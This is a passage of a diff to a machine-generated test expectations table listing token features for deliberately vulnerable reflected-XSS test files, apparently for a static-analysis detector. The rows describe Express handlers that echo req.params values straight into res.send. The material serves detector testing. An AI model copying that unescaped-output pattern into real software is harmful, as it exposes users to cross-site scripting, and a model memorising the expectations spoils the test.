contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:5 | res | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:13 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:88:7:88:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:88:7:88:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:88:7:88:10 | send | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:88:7:88:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:88:7:88:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:88:12:88:12 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:88:12:88:12 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:88:12:88:12 | p | contextFunctionInterfaces | | @@ -22212,6 +147882,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:88:12:88:12 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:88:12:88:12 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:88:12:88:12 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:5 | res | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | exceptional return of res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | exceptional return of res.send(other.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | exceptional return of res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | exceptional return of res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | exceptional return of res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | res.send(other.p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:89:3:89:19 | res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:89:7:89:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:7:89:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:89:7:89:10 | send | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:89:7:89:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:89:7:89:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:16 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:16 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:16 | other | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:16 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:16 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:18 | other.p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:18 | other.p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:18 | other.p | contextFunctionInterfaces | | @@ -22220,12 +147920,95 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:18 | other.p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:18 | other.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:89:12:89:18 | other.p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:89:18:89:18 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:89:18:89:18 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:89:18:89:18 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:89:18:89:18 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:89:18:89:18 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:0 | this | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:1 | prettier | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:1 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:1 | prettier | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:1:1:1 | require | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:11 | express | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:32 | express | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:5:1:32 | express ... press') | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:21 | require | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:32 | exceptional return of require('express') | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:1:15:1:32 | require('express') | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst3.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/tst3.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst3.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst3.js:1:23:1:31 | 'express' | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:7 | app | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:19 | app | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:5:3:19 | app = express() | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:17 | express | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:19 | exceptional return of express() | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:3:11:3:19 | express() | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:3 | app | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:10 | app.enable | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:10 | app.enable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:10 | app.enable | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:26 | app.ena ... ed-by') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:26 | app.ena ... ed-by') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:26 | app.ena ... ed-by') | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:26 | exceptional return of app.ena ... ed-by') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:26 | exceptional return of app.ena ... ed-by') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:26 | exceptional return of app.ena ... ed-by') | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:34 | app.ena ... disable | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:34 | app.ena ... disable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:34 | app.ena ... disable | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:50 | app.ena ... ed-by') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:50 | app.ena ... ed-by') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:50 | app.ena ... ed-by') | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:50 | exceptional return of app.ena ... ed-by') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:50 | exceptional return of app.ena ... ed-by') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:50 | exceptional return of app.ena ... ed-by') | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:54 | app.ena ... y').get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:54 | app.ena ... y').get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:4:54 | app.ena ... y').get | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:7:2 | app.ena ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:7:2 | app.ena ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:7:2 | app.ena ... T OK\\n}) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:7:2 | exceptional return of app.ena ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:7:2 | exceptional return of app.ena ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:1:7:2 | exceptional return of app.ena ... T OK\\n}) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:5:4:10 | enable | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:5:4:10 | enable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:5:4:10 | enable | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:4:12:4:25 | 'x-powered-by' | CalleeFlexibleAccessPath | app.enable | | autogenerated/Xss/ReflectedXss/tst3.js:4:12:4:25 | 'x-powered-by' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:4:12:4:25 | 'x-powered-by' | calleeImports | express | @@ -22233,24 +148016,145 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:4:12:4:25 | 'x-powered-by' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst3.js:4:12:4:25 | 'x-powered-by' | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:4:12:4:25 | 'x-powered-by' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst3.js:4:28:4:34 | disable | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:28:4:34 | disable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:28:4:34 | disable | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:4:36:4:49 | 'x-powered-by' | CalleeFlexibleAccessPath | app.enable().disable | | autogenerated/Xss/ReflectedXss/tst3.js:4:36:4:49 | 'x-powered-by' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:4:36:4:49 | 'x-powered-by' | calleeImports | express | | autogenerated/Xss/ReflectedXss/tst3.js:4:36:4:49 | 'x-powered-by' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst3.js:4:36:4:49 | 'x-powered-by' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst3.js:4:36:4:49 | 'x-powered-by' | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:52:4:54 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:52:4:54 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:52:4:54 | get | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:4:56:4:58 | '/' | CalleeFlexibleAccessPath | app.enable().disable().get | | autogenerated/Xss/ReflectedXss/tst3.js:4:56:4:58 | '/' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:4:56:4:58 | '/' | calleeImports | express | | autogenerated/Xss/ReflectedXss/tst3.js:4:56:4:58 | '/' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst3.js:4:56:4:58 | '/' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst3.js:4:56:4:58 | '/' | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:4:60 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:4:60 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:4:60 | this | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:4:60 | this | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:4:60 | this | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | 'arguments' object of anonymous function | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | exceptional return of anonymous function | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.enable().disable().get | | autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | functio ... OT OK\\n} | calleeImports | express | | autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | functio ... OT OK\\n} | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | return of anonymous function | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:61:7:1 | return of anonymous function | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:71:4:73 | req | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:4:76:4:78 | res | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:11 | { p } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:11 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:11 | { p } | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:11 | { p } | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:11 | { p } | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | p | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | p | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | p | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | { p } = req.params | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | { p } = req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:7:5:24 | { p } = req.params | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionBody | req res p req params res send p | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:5:9:5:9 | p | fileImports | express prettier | +| 